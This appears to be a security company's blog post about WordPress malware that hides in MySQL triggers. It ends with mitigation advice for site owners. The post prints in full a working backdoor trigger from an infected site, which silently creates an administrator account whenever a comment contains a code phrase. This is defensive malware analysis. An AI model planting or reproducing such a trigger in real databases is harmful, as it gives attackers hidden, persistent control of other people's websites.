Over the past year, there has been an increasing trend of WordPress malware using SQL triggers to hide malicious SQL queries inside compromised databases. These queries insert an administrator-level user into the infected database whenever the trigger condition is met.
What makes this especially problematic for website owners is that most malware cleaning guides focus on website files and data within specific database tables, for example wp_users , wp_options e wp_posts.
If you use a popular CMS on your website (like WordPress), chances are you use a MySQL databases for storing important data such as CMS settings and content (e.g. WordPress posts). This means that anything that can modify the MySQL database can also cause serious damage to the website, such as injecting malicious content or even deleting the content of your website.
This security risk is one of the reasons why the MySQL database is assigned a separate username and password (see the wp-config.php ): This feature prevents someone from remotely querying the MySQL database without the proper login information.
Since WordPress has access to your login information via wp-config.php , is able to read and make changes to the database defined within the configuration file.
Unfortunately, after attackers gain unauthenticated access, they can often read the file wp-config.php to learn login information for the website's database, which can then be used by the attacker's malware to connect to the database and make malicious changes.
SQL triggers
Un sql triggers is a stored procedure that runs automatically when specific changes are made to the database.
Il trigger, in databases, is a procedure that is automatically performed when a specific event occurs, such as the cancellation of a record of a table. This provides a technique for specifying and maintaining even complex integrity constraints. Triggers allow users to specify more complex integrity constraints since a trigger is essentially a PL/SQL (Oracle) procedure, Transact-SQL, etc.
This procedure is therefore associated with a table and is automatically called by the database engine when a certain change (or event) occurs within the table. Changes on the table can include operations INSERT, Update, and delete.
While they have many useful applications, we also have evidence that SQL triggers are used by malicious actors to maintain unauthorized access after a compromise. To do this, attackers insert an SQL trigger into a compromised website's database, and when specific criteria are met or an event occurs, the malicious stored action is executed.
For example, we found this interesting backdoor SQL trigger in the table wp_comments on the database of an infected website:
/*!50003 CREATE*/ /*!50017 DEFINER=`root_ext`@`%`*/ /*!50003 TRIGGER `after_insert_comment` AFTER INSERT ON `meccanicainnovativa`.`wp_comments` FOR EACH ROW BEGIN IF NEW.comment_content LIKE ' %are you struggling to get comments on your blog?%' THEN SET @lastInsertWpUsersId = (SELECT MAX(id) FROM `meccanicainnovativa`.`wp_users`); SET @nextWpUsersID = @lastInsertWpUsersId + 1; INSERT INTO `meccanicainnovativa`.`wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (@nextWpUsersID, 'wpadmin', '$1$yUXpYwXN$JhwaoGJxViPhtGdNG5UZs1', 'wpadmin', 'wp-security@hotmail.com', 'http://wordpress.com', '2014-06-08 00:00 :00', '', '0', 'Kris'); INSERT INTO `meccanicainnovativa`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, 'wp_capabilities', 'a:1:{s:13:\"administrator \";s:1:\"1\";}'); INSERT INTO `meccanicainnovativa`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, 'wp_user_level', '10'); END IF; END */;;
This SQL trigger creates a malicious admin user whenever a new comment containing the code words ” are you struggling to get comments on your blog? " ' is sent on the infected WordPress website.
The trigger checks the column comment_content in the database wp_comments , so it doesn't matter if the comment is approved or pending. Once the SQL trigger is active, it inserts a malicious admin user wpadmin with counterfeit recording date 2014-06-08 and email address wp-security@hotmail [ . ] com
Conclusion and mitigation steps
When a website has been compromised, you can bet that attackers will be looking for any database credentials found in wp-config or other CMS configuration files, and it can be incredibly difficult to identify whether the hacker collected this information at any point post-infection.
If If a compromise occurs, passwords must be updated throughout the environment, including the databases. Neglecting this post-hack step can lead to an attacker accessing and modifying your site even after you thought you had cleaned the infection.
If you doubt that your site may have a backdoor of this type, just export the database via a .sql dump and search the string TRIGGER inside the exported file.
Obviously not all TRIGGERs are backdoors, as we said before TRIGGERs are useful and legitimate tools; however, it is also true that using TRIGGER within WordPress installations is something very rare and highly unusual.
Hacked website owners can refer to our service on how to clean a hacked website for steps to clean up the infection. If you need a hand, we can help you clean up any malware and backdoors and secure your site.
